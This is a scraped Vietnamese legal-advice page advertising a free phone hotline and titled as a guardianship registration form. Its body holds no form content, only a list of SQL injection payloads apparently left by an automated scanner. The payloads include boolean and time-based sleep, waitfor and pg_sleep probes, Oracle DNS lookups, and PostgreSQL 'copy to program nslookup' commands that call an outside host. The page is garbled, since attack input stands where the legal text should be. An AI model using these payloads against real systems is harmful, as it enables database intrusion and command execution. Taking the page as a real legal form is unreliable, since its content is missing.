Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí việc giám hộ

Cập nhật lần cuối lúc 11:20 ngày 16/07/2013

Nguồn: vinalaf.com.vn
1
1
1
1
-1 OR 2+38-38-1=0+0+0+1 --
-1 OR 3+38-38-1=0+0+0+1 --
-1 OR 3*2<(0+5+38-38) --
1'"
\
1
@@W39S6
-1 OR 3*2>(0+5+38-38) --
JyI=
-1 OR 2+307-307-1=0+0+0+1
-1 OR 3+307-307-1=0+0+0+1
-1 OR 3*2<(0+5+307-307)
-1 OR 3*2>(0+5+307-307)
-1' OR 2+551-551-1=0+0+0+1 --
-1' OR 3+551-551-1=0+0+0+1 --
-1' OR 3*2<(0+5+551-551) --
-1' OR 3*2>(0+5+551-551) --
-1' OR 2+582-582-1=0+0+0+1 or 'tjRffQIh'='
-1' OR 3+582-582-1=0+0+0+1 or 'tjRffQIh'='
-1' OR 3*2<(0+5+582-582) or 'tjRffQIh'='
-1' OR 3*2>(0+5+582-582) or 'tjRffQIh'='
-1" OR 2+850-850-1=0+0+0+1 --
-1" OR 3+850-850-1=0+0+0+1 --
-1" OR 3*2<(0+5+850-850) --
-1" OR 3*2>(0+5+850-850) --
if(now()=sysdate(),sleep(5.719),0)/*'XOR(if(now()=sysdate(),sleep(5.719),0))OR'"XOR(if(now()=sysdate(),sleep(5.719),0))OR"*/
(select(0)from(select(sleep(5.719)))v)/*'+(select(0)from(select(sleep(5.719)))v)+'"+(select(0)from(select(sleep(5.719)))v)+"*/
(select(0)from(select(sleep(17.157)))v)/*'+(select(0)from(select(sleep(17.157)))v)+'"+(select(0)from(select(sleep(17.157)))v)+"*/
-1; waitfor delay '0:0:11.438' --
-1); waitfor delay '0:0:11.438' --
1 waitfor delay '0:0:11.438' --
Ynk8xxtY'; waitfor delay '0:0:11.438' --
-1;select pg_sleep(11.438); --
-1);select pg_sleep(11.438); --
-1));select pg_sleep(17.157); --
3VRV5MqO';select pg_sleep(17.157); --
b7jGEmzr');select pg_sleep(17.157); --
Etd7dXOB'));select pg_sleep(17.157); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6063.34060.f4ba5.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6064.34060.f4ba5.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6065.34060.f4ba5.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6066.34060.f4ba5.\1.bxss.me
943'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: